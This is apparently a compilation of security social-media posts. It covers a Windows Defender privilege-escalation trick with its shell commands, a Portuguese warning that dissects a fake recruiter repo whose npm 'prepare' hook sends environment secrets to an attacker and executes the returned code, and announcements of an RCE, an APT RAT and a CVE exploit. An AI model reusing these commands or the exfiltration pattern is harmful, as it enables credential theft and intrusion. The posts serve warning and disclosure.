RedSun: Exploiting Windows Defender's Remediation Workflow for Local Privilege Escalation
Just showing some appreciation for @ChaoticEclipse0's excellent work. Hopefully this won't get us banned!
https://t.co/Z4zbaa2Jcd
@ibuildthecloud How else would you do this?
mkdir wtf.{0AFACED1-E828-11D1-9187-B532F1E9575D}
cd "wtf.{0AFACED1-E828-11D1-9187-B532F1E9575D}"
copy "%APPDATA%\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk" target.lnk
⚠️ Devs, parem tudo e leiam. Quase rodei malware na minha máquina agora mesmo e quero que vocês saibam exatamente como funciona o golpe.
Recebi um link de um repo no GitHub: um "MVP" de um projeto web3/poker, com pedido pra clonar e rodar localmente. Visual de teste técnico, daqueles que recruiter manda. Antes de tocar em qualquer coisa, parei e li o código pelo próprio GitHub, sem clonar.
Bem que desconfiei. Era malware. E não um qualquer — tinha DOIS payloads que executam SOZINHOS, sem você rodar nada explicitamente.
🎯 Payload 1 — dispara no `npm install`
O `package.json` tinha `"prepare": "node server/server.js"`. O detalhe maldoso: o script `prepare` roda AUTOMÁTICO toda vez que você dá `npm install`. Dentro dele, escondido nas rotas do servidor, um:
`https://t.co/EHtEFLu5Yg(url, { ...process.env })`
Ou seja: ele empacota TODAS as suas variáveis de ambiente — chaves de AWS, tokens de API, secrets, seed phrase de carteira cripto — e manda pro servidor do atacante. E não para aí: a RESPOSTA do servidor é passada pra `new Function("require", resposta)(require)`. Isso é execução de código arbitrário, com acesso total ao Node: filesystem, child_process, rede. Ele pode roubar suas chaves SSH, instalar persistência, o que quiser.
A URL do atacante? Escondida em base64 no `.env`, decodificando pra um domínio na Vercel. Disfarce em cima de disfarce.
Found an unpatched RCE in Gogs 👀 Any authenticated user can get code execution on the server through argument injection into git rebase. Full @rapid7 writeup + @metasploit module available now!
🔗https://t.co/VAYLxZ6o1b
North Korean 🇰🇵 Lazarus APT deploys RemotePE, a fileless RAT that runs entirely in memory using DPAPI encryption keying. Fox-IT analysis shows active development from 2023-2024 with manual C2 operator approval during KST hours.
#DFIR_Radar
A post about how Windows Named Pipes can become an attack surface when their ACLs are too permissive or when pipe creation flags are misused
https://t.co/m3KnfqXNfk
#infosec#cybersecurity#redteam#pentest#windows
GitHub - orinimron123/CVE-2026-40369-EXPLOIT: Full exploit code for CVE-2026-40369 - A Windows kernel arbitrary write vulnerability that allows browser sandbox escape from all browsers render process sandbox · GitHub https://t.co/12eWzOQNR8